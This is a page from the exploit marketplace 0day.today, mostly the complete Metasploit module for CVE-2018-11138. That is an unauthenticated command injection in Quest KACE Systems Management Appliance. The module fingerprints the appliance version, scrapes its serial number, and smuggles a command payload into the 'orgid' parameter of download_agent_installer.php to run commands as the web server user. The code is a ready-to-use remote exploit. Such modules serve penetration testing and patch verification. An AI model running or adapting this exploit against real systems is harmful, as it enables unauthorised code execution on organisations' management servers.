0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Quest KACE Systems Management - Command Injection Exploit
Author
Risk
[Security Risk High
]0day-ID
Category
Date add
CVE
Platform
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Quest KACE Systems Management Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in Quest KACE
Systems Management Appliance version 8.0.318 (and possibly prior).
The `download_agent_installer.php` file allows unauthenticated users
to execute arbitrary commands as the web server user `www`.
A valid Organization ID is required. The default value is `1`.
A valid Windows agent version number must also be provided. If file
sharing is enabled, the agent versions are available within the
`\\kace.local\client\agent_provisioning\windows_platform` Samba share.
Additionally, various agent versions are listed on the KACE website.
This module has been tested successfully on Quest KACE Systems
Management Appliance K1000 version 8.0 (Build 8.0.318).
},
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => 'unix', # FreeBSD
'Arch' => ARCH_CMD,
'DisclosureDate' => 'May 31 2018',
'Author' =>
[
'Leandro Barragan', # Discovery and PoC
'Guido Leo', # Discovery and PoC
'Brendan Coles', # Metasploit
],
'References' =>
[
['CVE', '2018-11138'],
['URL', 'https://support.quest.com/product-notification/noti-00000134'],
['URL', 'https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities']
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x27",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl'
}
},
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0))
register_options [
OptString.new('SERIAL', [false, 'Serial number', '']),
OptString.new('ORGANIZATION', [true, 'Organization ID', '1']),
OptString.new('AGENT_VERSION', [true, 'Windows agent version', '8.0.152'])
]
end
def check
res = send_request_cgi('uri' => normalize_uri('common', 'download_agent_installer.php'))
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
unless res.code == 302 && res.headers.to_s.include?('X-KACE-Appliance')
vprint_status 'Remote host is not a Quest KACE appliance'
return CheckCode::Safe
end
unless res.headers['X-KACE-Version'] =~ /\A([0-9]+)\.([0-9]+)\.([0-9]+)\z/
vprint_error 'Could not determine KACE appliance version'
return CheckCode::Detected
end
version = Gem::Version.new res.headers['X-KACE-Version'].to_s
vprint_status "Found KACE appliance version #{version}"
# Patched versions : https://support.quest.com/product-notification/noti-00000134
if version < Gem::Version.new('7.0') ||
(version >= Gem::Version.new('7.0') && version < Gem::Version.new('7.0.121307')) ||
(version >= Gem::Version.new('7.1') && version < Gem::Version.new('7.1.150')) ||
(version >= Gem::Version.new('7.2') && version < Gem::Version.new('7.2.103')) ||
(version >= Gem::Version.new('8.0') && version < Gem::Version.new('8.0.320')) ||
(version >= Gem::Version.new('8.1') && version < Gem::Version.new('8.1.108'))
return CheckCode::Appears
end
CheckCode::Safe
end
def serial_number
return datastore['SERIAL'] unless datastore['SERIAL'].to_s.eql? ''
res = send_request_cgi('uri' => normalize_uri('common', 'about.php'))
return unless res
res.body.scan(/Serial Number: ([A-F0-9]+)/).flatten.first
end
def exploit
check_code = check
unless [CheckCode::Appears, CheckCode::Detected].include? check_code
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
serial = serial_number
if serial.to_s.eql? ''
print_error 'Could not retrieve appliance serial number. Try specifying a SERIAL.'
return
end
vprint_status "Using serial number: #{serial}"
print_status "Sending payload (#{payload.encoded.length} bytes)"
vars_get = Hash[{
'platform' => 'windows',
'serv' => Digest::SHA256.hexdigest(serial),
'orgid' => "#{datastore['ORGANIZATION']}#; #{payload.encoded} ",
'version' => datastore['AGENT_VERSION']
}.to_a.shuffle]
res = send_request_cgi({
'uri' => normalize_uri('common', 'download_agent_installer.php'),
'vars_get' => vars_get
}, 10)
unless res
fail_with Failure::Unreachable, 'Connection failed'
end
unless res.headers.to_s.include?('KACE') || res.headers.to_s.include?('KBOX')
fail_with Failure::UnexpectedReply, 'Unexpected reply'
end
case res.code
when 200
print_good 'Payload executed successfully'
when 404
fail_with Failure::BadConfig, 'The specified AGENT_VERSION is not valid for the specified ORGANIZATION'
when 302
if res.headers['location'].include? 'error.php'
fail_with Failure::UnexpectedReply, 'Server encountered an error'
end
fail_with Failure::BadConfig, 'The specified SERIAL is incorrect'
else
print_error 'Unexpected reply'
end
register_dir_for_cleanup "/tmp/agentprov/#{datastore['ORGANIZATION']}#;/"
end
end
# 0day.today [2024-11-15] #